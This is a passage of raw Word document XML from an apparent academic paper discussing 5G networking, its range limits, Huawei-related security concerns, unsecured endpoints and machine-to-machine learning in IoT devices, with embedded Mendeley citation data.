Gb/s","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=3f68a213-0190-4af6-984d-c3d4c5ef062d"]}],"mendeley":{"formattedCitation":"[54]","plainTextFormattedCitation":"[54]","previouslyFormattedCitation":"[54]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00D57F66">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF48EA" w:rsidRPr="00CF48EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[54]</w:t>
      </w:r>
      <w:r w:rsidR="00D57F66">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="598FE91C" w14:textId="00EEB74F" w:rsidR="00672277" w:rsidRDefault="00672277" w:rsidP="007E1616">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64442293" w14:textId="2420240F" w:rsidR="004B2AB9" w:rsidRDefault="00672277" w:rsidP="007E1616">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5G also has a very low power consumption in comparison to 3G and 4G cellular access points which </w:t>
      </w:r>
      <w:r w:rsidR="009325A0">
        <w:t>allows for a very large connection density to support billions of devices</w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.bluespace-5gppp.eu/news/2017/7/12/g4k9pszqqyi1te684kt7b1t1dvzm5m","abstract":"low poer 5g","accessed":{"date-parts":[["2019","5","2"]]},"author":[{"dropping-particle":"","family":"Bluespace-5G","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Bluespace-5G","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"page":"1","title":"Achieving a 90% reduction in power consumption for 5G — Bluespace 5G Technologies","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=e243b619-b5ef-352d-9a08-53d962c801a0"]}],"mendeley":{"formattedCitation":"[55]","plainTextFormattedCitation":"[55]","previouslyFormattedCitation":"[55]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF48EA" w:rsidRPr="00CF48EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[55]</w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC8A848" w14:textId="77777777" w:rsidR="004B2AB9" w:rsidRDefault="004B2AB9" w:rsidP="007E1616">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C546EAD" w14:textId="08FE8988" w:rsidR="00CF48EA" w:rsidRDefault="00485CE9" w:rsidP="007E1616">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The caveat to 5G networking is because it </w:t>
      </w:r>
      <w:r w:rsidR="00466268">
        <w:t xml:space="preserve">operates at a higher frequency range that allows for ultra-fast data throughput, it also has </w:t>
      </w:r>
      <w:r w:rsidR="00AB30B6">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="001342E1">
        <w:t>much</w:t>
      </w:r>
      <w:r w:rsidR="00466268">
        <w:t xml:space="preserve"> shorte</w:t>
      </w:r>
      <w:r w:rsidR="001342E1">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00466268">
        <w:t xml:space="preserve"> range</w:t>
      </w:r>
      <w:r w:rsidR="001342E1">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00466268">
        <w:t xml:space="preserve"> that means the 5G networks will have to </w:t>
      </w:r>
      <w:r w:rsidR="00AB30B6">
        <w:t>rely on</w:t>
      </w:r>
      <w:r w:rsidR="00466268">
        <w:t xml:space="preserve"> a mesh of ‘Ad-hoc’ Peer-to-Peer (P2P)’ relay </w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:lastRenderedPageBreak/>
        <w:t>base stations</w:t>
      </w:r>
      <w:r w:rsidR="00466268">
        <w:t xml:space="preserve"> to navigate around objects </w:t>
      </w:r>
      <w:r w:rsidR="001342E1">
        <w:t xml:space="preserve">obstructing the path to </w:t>
      </w:r>
      <w:r w:rsidR="004B2AB9">
        <w:t xml:space="preserve">5G </w:t>
      </w:r>
      <w:r w:rsidR="00466268">
        <w:t>access points (AP).</w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.14445/22492615/ijptt-v32p401","abstract":"Fifth Generation of Mobile Wireless Communication: 5G","author":[{"dropping-particle":"","family":"Masade","given":"Kanchan K","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Bhalerao","given":"D.M","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"International Journal of P2P Network Trends and Technology","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"Fifth Generation of Mobile Wireless Communication: 5G","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=f71f79d1-4e6b-4cf5-a466-a6d066d3d353"]}],"mendeley":{"formattedCitation":"[56]","plainTextFormattedCitation":"[56]","previouslyFormattedCitation":"[56]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF48EA" w:rsidRPr="00CF48EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[56]</w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EEE2E0" w14:textId="77777777" w:rsidR="00A94B2C" w:rsidRDefault="00A94B2C" w:rsidP="007E1616">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111E8380" w14:textId="68CFCC93" w:rsidR="00F1502D" w:rsidRDefault="001342E1" w:rsidP="007E1616">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Therefore, for 5G to be successful the entire national infrastructure will have to be upgraded with multitudes of 5G relay antennas that will cost billions in taxpayers money, and as previously discussed in the </w:t>
      </w:r>
      <w:r w:rsidRPr="001342E1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cyberwarfare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> section of this paper</w:t>
      </w:r>
      <w:r w:rsidR="00AB30B6">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Chinese company Huawei are the market leaders within advanced 5G networking hardware who are currently under investigation by the US </w:t>
      </w:r>
      <w:r w:rsidR="00AB30B6">
        <w:t xml:space="preserve">government for allegations of </w:t>
      </w:r>
      <w:r>
        <w:t>installing malware in their devices for cyber-espionage</w:t>
      </w:r>
      <w:r w:rsidR="00AB30B6">
        <w:t xml:space="preserve">, this is very worrying because many </w:t>
      </w:r>
      <w:r w:rsidR="0049718F">
        <w:t>countries</w:t>
      </w:r>
      <w:r w:rsidR="00AB30B6">
        <w:t xml:space="preserve"> in mainland Europe currently utilise </w:t>
      </w:r>
      <w:r w:rsidR="0049718F">
        <w:t>Huawei</w:t>
      </w:r>
      <w:r w:rsidR="00AB30B6">
        <w:t xml:space="preserve"> hardware and have already struck a deal to install their 5G </w:t>
      </w:r>
      <w:r w:rsidR="00852A61">
        <w:t>equipment</w:t>
      </w:r>
      <w:r w:rsidR="00AB30B6">
        <w:t xml:space="preserve"> within their cities to </w:t>
      </w:r>
      <w:r w:rsidR="00852A61">
        <w:t>create</w:t>
      </w:r>
      <w:r w:rsidR="00AB30B6">
        <w:t xml:space="preserve"> the fut</w:t>
      </w:r>
      <w:r w:rsidR="00852A61">
        <w:t>uristic ‘Smart Cities’</w:t>
      </w:r>
      <w:r w:rsidR="00A76A46">
        <w:t xml:space="preserve"> previously discussed</w:t>
      </w:r>
      <w:r w:rsidR="00852A61">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.bloomberg.com/news/articles/2019-04-15/huawei-s-avoiding-outright-bans-but-not-5g-regulations-in-europe","abstract":"5G Europe huawei","accessed":{"date-parts":[["2019","5","2"]]},"author":[{"dropping-particle":"","family":"Bloomberg","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"bloomberg.com","id":"ITEM-1","issued":{"date-parts":[["2019"]]},"page":"1","title":"Huawei Escaping European Ban, But 5G Regulators Are Closing In - Bloomberg","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=1f9ee7b8-63f1-37c5-8b2b-b2fef0749663"]}],"mendeley":{"formattedCitation":"[57]","plainTextFormattedCitation":"[57]","previouslyFormattedCitation":"[57]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF48EA" w:rsidRPr="00CF48EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[57]</w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1080/00396338.2019.1568041","ISSN":"14682699","abstract":"Chinese telecommunications titan Huawei has been suffering from the kind of publicity no company would ever welcome. In short order, Australia, New Zealand and Japan have all banned Huawei from taking part in the devel- opment of 5G networks owing to security concerns. The United Kingdom’s British Telecom (BT), which has been using Huawei equipment in its core networks for the past decade, has announced that it will not use Huawei equipment in its 5G networks, and is stripping Huawei equipment out of its 3G and 4G networks. In December, the heads of the British, Canadian and other allied intelligence services expressed concerns about security threats posed by Chinese technology.1 These developments suggest that the United States has been whipping its key allies into line. Meanwhile, European Commissioner for Digital Single Market Andrus Ansip stated that the EU should be worried about the threat posed by Huawei and other Chinese technology companies to the bloc’s industry and security.","author":[{"dropping-particle":"","family":"Inkster","given":"Nigel","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Survival","id":"ITEM-1","issued":{"date-parts":[["2019"]]},"title":"The Huawei affair and China’s technology ambitions","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=d4006cc6-564d-4b0a-a856-c89ee27311a5"]}],"mendeley":{"formattedCitation":"[25]","plainTextFormattedCitation":"[25]","previouslyFormattedCitation":"[25]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF48EA" w:rsidRPr="00CF48EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[25]</w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A8C3E4" w14:textId="07A74338" w:rsidR="0049718F" w:rsidRDefault="0049718F" w:rsidP="007E1616">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36CA7963" w14:textId="29CED392" w:rsidR="00A15113" w:rsidRDefault="00A15113" w:rsidP="007E1616">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The multitude of 5G </w:t>
      </w:r>
      <w:r w:rsidR="00B96EC4">
        <w:t>endpoints that will be installed around cities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="00B96EC4">
        <w:t xml:space="preserve"> also </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00B96EC4">
        <w:t xml:space="preserve"> major concern to cybersecurity professional</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B96EC4">
        <w:t xml:space="preserve">as these endpoints </w:t>
      </w:r>
      <w:r>
        <w:t>will not</w:t>
      </w:r>
      <w:r w:rsidR="00B96EC4">
        <w:t xml:space="preserve"> all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be physically </w:t>
      </w:r>
      <w:r w:rsidR="009B2D9D">
        <w:t>secured within</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00746D22">
        <w:t>city’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> infrastructure</w:t>
      </w:r>
      <w:r w:rsidR="00B96EC4">
        <w:t xml:space="preserve">, this will make it very easy for malicious actors </w:t>
      </w:r>
      <w:r>
        <w:t>to infiltrat</w:t>
      </w:r>
      <w:r w:rsidR="00B96EC4">
        <w:t>e the 5G endpoints</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by malicious actors who could steal the data being transmitted through</w:t>
      </w:r>
      <w:r w:rsidR="00B96EC4">
        <w:t xml:space="preserve"> them</w:t>
      </w:r>
      <w:r w:rsidR="009B2D9D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00DA749C">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"author":[{"dropping-particle":"","family":"ncsa","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"ncsa.gov.uk","id":"ITEM-1","issued":{"date-parts":[["2019"]]},"title":"Security, complexity and Huawei; protecting the UK's telecoms networksNo Title","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=9cf27f61-4975-4be3-a68a-50232f8d6537"]}],"mendeley":{"formattedCitation":"[58]","plainTextFormattedCitation":"[58]","previouslyFormattedCitation":"[58]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF48EA" w:rsidRPr="00CF48EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[58]</w:t>
      </w:r>
      <w:r w:rsidR="00CF48EA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB2584" w14:textId="77777777" w:rsidR="009B2D9D" w:rsidRDefault="009B2D9D" w:rsidP="007E1616">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D0155E" w14:textId="0AFDBAAB" w:rsidR="00F1502D" w:rsidRDefault="00F1502D" w:rsidP="00F1502D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1502D">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>M2M Learning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64907C62" w14:textId="43FC6849" w:rsidR="004F29D7" w:rsidRDefault="00477EAB" w:rsidP="009325A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>M2M learning is the process of devices</w:t>
      </w:r>
      <w:r w:rsidR="004F29D7">
        <w:t xml:space="preserve"> communicating and making decisions between themselves in an ad-hoc </w:t>
      </w:r>
      <w:r w:rsidR="005546BB">
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidR="004F29D7">
        <w:t xml:space="preserve"> that don’t have to communicate with an application server to receive instruction on what action to perform.</w:t>
      </w:r>
      <w:r w:rsidR="00DA749C">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00F04EEE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1002/9781119974031.ch1","ISBN":"9781119974031","abstract":"This Teaching Resource provides lecture notes, slides, and a problem set for a set of three lectures from a course entitled \"Systems Biology: Biomedical Modeling.\" The materials are from three separate lectures introducing applications of graph theory and network analysis in systems biology. The first lecture describes different types of intracellular networks, methods for constructing biological networks, and different types of graphs used to represent regulatory intracellular networks. The second lecture surveys milestones and key concepts in network analysis by introducing topological measures, random networks, growing network models, and topological observations from molecular biological systems abstracted to networks. The third lecture discusses methods for analyzing lists of genes and experimental data in the context of prior knowledge networks to make predictions.","author":[{"dropping-particle":"","family":"Darmois","given":"Emmanuel","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Elloumi","given":"Omar","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"M2M Communications: A Systems Approach","id":"ITEM-1","issued":{"date-parts":[["2011"]]},"title":"Introduction to M2M","type":"article-magazine"},"uris":["http://www.mendeley.com/documents/?uuid=858da30f-86f0-4db2-a50b-a7cbdd85d711"]},{"id":"ITEM-2","itemData":{"DOI":"10.1126/science.aaa8415","ISSN":"10959203","abstract":"Machine learning addresses the question of how to build computers that improve automatically through experience. It is one of today's most rapidly growing technical fields, lying at the intersection of computer science and statistics, and at the core of artificial intelligence and data science. Recent progress in machine learning has been driven both by the development of new learning algorithms and theory and by the ongoing explosion in the availability of online data and low-cost computation. The adoption of data-intensive machine-learning methods can be found throughout science, technology and commerce, leading to more evidence-based decision-making across many walks of life, including health care, manufacturing, education, financial modeling, policing, and marketing.","author":[{"dropping-particle":"","family":"Jordan","given":"M. I.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mitchell","given":"T. M.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Science","id":"ITEM-2","issued":{"date-parts":[["2015"]]},"title":"Machine learning: Trends, perspectives, and prospects","type":"article"},"uris":["http://www.mendeley.com/documents/?uuid=415b9a01-435c-4663-b2a1-438ccda31132"]}],"mendeley":{"formattedCitation":"[59], [60]","plainTextFormattedCitation":"[59], [60]","previouslyFormattedCitation":"[59], [60]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00DA749C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DA749C" w:rsidRPr="00DA749C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[59], [60]</w:t>
      </w:r>
      <w:r w:rsidR="00DA749C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EE6969" w14:textId="77777777" w:rsidR="009802D6" w:rsidRDefault="009802D6" w:rsidP="009325A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60A8D690" w14:textId="0B9AF658" w:rsidR="00117105" w:rsidRDefault="004F29D7" w:rsidP="009325A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5G networks will give birth to much larger</w:t>
      </w:r>
      <w:r w:rsidR="009325A0" w:rsidRPr="009325A0">
        <w:t xml:space="preserve"> IoT applications </w:t>
      </w:r>
      <w:r w:rsidR="00B160C4">
        <w:t>that will have</w:t>
      </w:r>
      <w:r w:rsidR="003D1FF7">
        <w:t xml:space="preserve"> advanced</w:t>
      </w:r>
      <w:r w:rsidR="00B160C4">
        <w:t xml:space="preserve"> M2M capabilities</w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t>, meaning IoT devices will not have to communicate with an application server to relay information and receive instruction on what action to perform</w:t>
      </w:r>
      <w:r w:rsidR="00B160C4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve">Future IoT devices with </w:t>
      </w:r>
      <w:r w:rsidR="003D1FF7">
        <w:t xml:space="preserve">advanced </w:t>
      </w:r>
      <w:r w:rsidR="00B160C4">
        <w:t xml:space="preserve">M2M </w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve">learning capabilities will </w:t>
      </w:r>
      <w:r w:rsidR="00B160C4">
        <w:t xml:space="preserve">utilise autonomous </w:t>
      </w:r>
      <w:r w:rsidR="003D1FF7">
        <w:t>semi-</w:t>
      </w:r>
      <w:r w:rsidR="00B160C4" w:rsidRPr="009325A0">
        <w:t>AI</w:t>
      </w:r>
      <w:r w:rsidR="00B160C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t>that will allow each IoT device to communicate with each other and make decisions between themselves</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004F7340" w:rsidRPr="009325A0">
        <w:t>these</w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve"> enhanced IoT smart device capabilities </w:t>
      </w:r>
      <w:r w:rsidR="009B2D9D">
        <w:t>will be</w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve"> possible because </w:t>
      </w:r>
      <w:r w:rsidR="009325A0" w:rsidRPr="009325A0">
        <w:t xml:space="preserve">of the </w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve">future </w:t>
      </w:r>
      <w:r w:rsidR="009325A0" w:rsidRPr="009325A0">
        <w:t>5G network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as previously discussed</w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve">. M2M will allow IoT devices to react </w:t>
      </w:r>
      <w:r>
        <w:t>a lot quicker</w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00117105">
        <w:t>in real-time mission</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00117105">
        <w:t xml:space="preserve">critical environments </w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t>from the M2M decision</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve">making algorithms within the future </w:t>
      </w:r>
      <w:r w:rsidR="00117105">
        <w:t xml:space="preserve">advanced </w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve">IoT devices </w:t>
      </w:r>
      <w:r>
        <w:t>that will utilise</w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">onboard </w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t>applications without consulting a server</w:t>
      </w:r>
      <w:r w:rsidR="0045681A">
        <w:t xml:space="preserve"> such as wireless sensor network, industrial control systems, smart grid control systems</w:t>
      </w:r>
      <w:r w:rsidR="00117105">
        <w:t>, smart roads and cars</w:t>
      </w:r>
      <w:r w:rsidR="0021261F">
        <w:t xml:space="preserve">, public transport, video </w:t>
      </w:r>
      <w:r w:rsidR="00C10431">
        <w:t>surveillance</w:t>
      </w:r>
      <w:r w:rsidR="00117105">
        <w:t xml:space="preserve"> etc. </w:t>
      </w:r>
      <w:r w:rsidR="00F04EEE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00F04EEE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1109/MCOM.2017.1600559","ISSN":"01636804","abstract":"M2M communication offers ubiquitous applications and is one of the leading facilitators of the Internet of Things paradigm. Unlike human-tohuman communication, distinct features of M2M traffic necessitates specialized and interoperable communication technologies. However, most existing solutions offering wired or wireless connectivity have limitations that hinder widespread horizons of M2M applications. To cope with the peculiar nature of M2M traffic, the evolving 5G system considers the integration of key enabling networking technologies for ubiquitous connectivity and guaranteed QoS. This study outlines the state-of-the-art architecture, recent advances, and open research challenges in communication technologies for M2M. Also, an overview of considerable architectural enhancements and novel techniques expected in 5G networks is presented, followed by the resultant services and benefits for M2M communications.","author":[{"dropping-particle":"","family":"Mehmood","given":"Yasir","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Haider","given":"Noman","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Imran","given":"Muhammad","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Timm-Giel","given":"Andreas","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Guizani","given":"Mohsen","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"IEEE Communications Magazine","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"M2M Communications in 5G: State-of-the-Art Architecture, Recent Advances, and Research Challenges","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=d4cc3711-69fc-43d3-8e00-bd1b145a17d4"]}],"mendeley":{"formattedCitation":"[61]","plainTextFormattedCitation":"[61]","previouslyFormattedCitation":"[61]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00F04EEE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F04EEE" w:rsidRPr="00F04EEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[61]</w:t>
      </w:r>
      <w:r w:rsidR="00F04EEE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C676CF0" w14:textId="77777777" w:rsidR="00117105" w:rsidRDefault="00117105" w:rsidP="009325A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42EEE213" w14:textId="2E70DA74" w:rsidR="009325A0" w:rsidRDefault="00117105" w:rsidP="009325A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Future advanced IoT M2M learning devices </w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve">will </w:t>
      </w:r>
      <w:r w:rsidR="000946C1">
        <w:t xml:space="preserve">drastically </w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve">reduce the management and traffic of IoT </w:t>
      </w:r>
      <w:r w:rsidR="004F29D7">
        <w:t>devices communicating</w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve"> with IoT application servers within the cloud</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F65666">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00976BEE">
        <w:t>therefore,</w:t>
      </w:r>
      <w:r w:rsidR="00F65666">
        <w:t xml:space="preserve"> considerably re</w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t>duc</w:t>
      </w:r>
      <w:r w:rsidR="00976BEE">
        <w:t xml:space="preserve">ing </w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00F65666">
        <w:t xml:space="preserve">economic </w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t>operating costs of IoT technolog</w:t>
      </w:r>
      <w:r w:rsidR="00976BEE">
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve"> company’s server hardware utilisation</w:t>
      </w:r>
      <w:r w:rsidR="004F29D7">
        <w:t xml:space="preserve"> and IoT professionals</w:t>
      </w:r>
      <w:r w:rsidR="00F65666">
        <w:t xml:space="preserve"> employed</w:t>
      </w:r>
      <w:r w:rsidR="004F7340">
        <w:t xml:space="preserve"> within datacentres around the globe. </w:t>
      </w:r>
    </w:p>
